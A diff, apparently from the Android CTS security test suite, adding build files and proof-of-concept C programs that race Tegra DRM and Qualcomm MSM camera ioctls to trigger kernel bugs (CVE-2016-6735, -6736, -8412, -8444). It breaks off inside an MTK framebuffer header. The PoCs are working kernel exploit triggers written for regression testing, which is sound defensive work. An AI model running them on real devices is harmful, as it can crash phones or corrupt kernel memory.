+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6735
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
new file mode 100644
index 0000000..f38f411
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/poc.c
@@ -0,0 +1,160 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_STOP_KEEPON 0x11
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM 900
+#define TRY_TIMES SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ if(ret){
+ goto out_submit_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set submit */
+ submit_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_submit_thread:
+ /* kill submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_kill(submit_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+ long i;
+ int pid;
+ pthread_t th[6];
+ int argn[50] = {0};
+
+ fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ pid = fork();
+ if(!pid){
+ argn[0] = 1;
+ while(1){
+ usleep(10);
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+ }
+ }
+ i = 0;
+ while(1){
+ i++;
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ usleep(100);
+
+ argn[0] = 0;
+ syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+ }
+
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
index 554b97d..0717d0b 100644
--- a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -15,6 +15,7 @@
*/
#define _GNU_SOURCE
+#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <dirent.h>
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+ int32_t cfg_type;
+ union {
+ int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
+ uint32_t csid_version; /* ISPIF_INIT */
+ //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
+ //struct msm_ispif_param_data params; /* CFG, START, STOP */
+ };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+ int arg1[3] = {0};
+ switch ((long)arg) {
+ case 0:
+ data.cfg_type = 8; ////release
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+ break;
+ case 1:
+ ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+ break;
+ }
+ return NULL;
+}
+
+int main() {
+
+ int pid,i;
+ pthread_t th[4];
+ fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+ printf("please wait for several seconds...\n");
+
+ while(1){
+
+ data.cfg_type = 2; ////init
+ data.csid_version = 1;
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+ for (i = 0; i < 2; i++) {
+ pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+ usleep(10);
+ }
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK (0x00000fff)
+#define FBCAPS_LCDC_MASK (0x00fff000)
+#define FBCAPS_PANEL_MASK (0xff000000)
+#define FBCAPS_MANUAL_UPDATE (0x00001000)
+#define FBCAPS_SET_BACKLIGHT (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
+#define MTK_IO(num) _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
+#define MTKFB_POWERON MTK_IO(12)
+#define MTKFB_POWEROFF MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION MTK_IO(49)
+#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
